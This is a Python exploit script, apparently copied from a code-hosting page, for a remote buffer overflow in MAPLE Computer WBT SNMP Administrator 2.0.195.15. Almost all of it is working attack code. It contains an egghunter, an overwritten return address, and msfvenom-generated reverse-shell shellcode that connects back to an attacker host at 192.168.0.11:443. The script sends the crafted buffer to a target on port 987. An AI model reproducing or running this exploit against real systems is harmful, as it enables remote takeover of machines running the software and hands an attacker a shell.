136 lines
No EOL
5.7 KiB
Python
Executable file
136 lines
No EOL
5.7 KiB
Python
Executable file
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
|
|
# Author: sasaga92
|
|
# Discovery Date: 2019-07-18
|
|
# Vendor Homepage: www.computerlab.com
|
|
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
|
|
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
|
|
# Tested on OS: Windows XP SP2 x86
|
|
# CVE: N/A
|
|
# [+] Credits: John Page (aka hyp3rlinx)
|
|
|
|
|
|
#!/usr/bin/python
|
|
|
|
import sys
|
|
import socket
|
|
import random
|
|
import string
|
|
import struct
|
|
|
|
|
|
|
|
def pattern_create(_type,_length):
|
|
_type = _type.split(" ")
|
|
|
|
if _type[0] == "trash":
|
|
return _type[1] * _length
|
|
elif _type[0] == "random":
|
|
return ''.join(random.choice(string.lowercase) for i in range(_length))
|
|
elif _type[0] == "pattern":
|
|
_pattern = ''
|
|
_parts = ['A', 'a', '0']
|
|
while len(_pattern) != _length:
|
|
_pattern += _parts[len(_pattern) % 3]
|
|
if len(_pattern) % 3 == 0:
|
|
_parts[2] = chr(ord(_parts[2]) + 1)
|
|
if _parts[2] > '9':
|
|
_parts[2] = '0'
|
|
_parts[1] = chr(ord(_parts[1]) + 1)
|
|
if _parts[1] > 'z':
|
|
_parts[1] = 'a'
|
|
_parts[0] = chr(ord(_parts[0]) + 1)
|
|
if _parts[0] > 'Z':
|
|
_parts[0] = 'A'
|
|
return _pattern
|
|
else:
|
|
return "Not Found"
|
|
|
|
def pwned(_host, _port, _payload):
|
|
print "[*] Conectandose a {0}:{1}...".format(_host, _port)
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((_host, _port))
|
|
print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
|
|
_payload = "{0}\r\n\r\n".format(_payload)
|
|
s.send(_payload)
|
|
_data = s.recv(1024)
|
|
s.shutdown
|
|
s.close
|
|
print 'Recibido:', repr(_data)
|
|
print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))
|
|
|
|
|
|
def main():
|
|
|
|
_host = "192.168.0.12"
|
|
_port = 987
|
|
_offset_eip = 642200
|
|
_padding = 642144
|
|
_eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
|
|
_tag = "w00tw00t"
|
|
|
|
#msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
|
|
_shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
|
|
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
|
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
|
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
|
"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
|
|
"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
|
|
"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
|
|
"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
|
|
"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
|
|
"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
|
|
"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
|
|
"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
|
|
"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
|
|
"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
|
|
"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
|
|
"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
|
|
"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
|
|
"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
|
|
"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
|
|
"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
|
|
"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
|
|
"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
|
|
"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
|
|
"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
|
|
"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
|
|
"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
|
|
"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
|
|
"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
|
|
"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
|
|
"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
|
|
"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
|
|
"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
|
|
"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
|
|
"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
|
|
"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
|
|
"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
|
|
"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
|
|
"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
|
|
"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
|
|
"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
|
|
"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
|
|
"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
|
|
"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
|
|
"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
|
|
"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
|
|
"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
|
|
"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
|
|
"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
|
|
"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
|
|
"\x70\x73\x63\x69\x6f\x59\x45\x41\x41")
|
|
|
|
_egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
|
|
|
|
_inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
|
|
_inject += _tag
|
|
_inject += _shellcode
|
|
_inject += _egghunter
|
|
_inject += pattern_create("trash B", _offset_eip-len(_inject))
|
|
_inject += _eip
|
|
|
|
print(_inject)
|
|
pwned(_host,_port,_inject)
|
|
|
|
if __name__ == "__main__":
|
|
main() |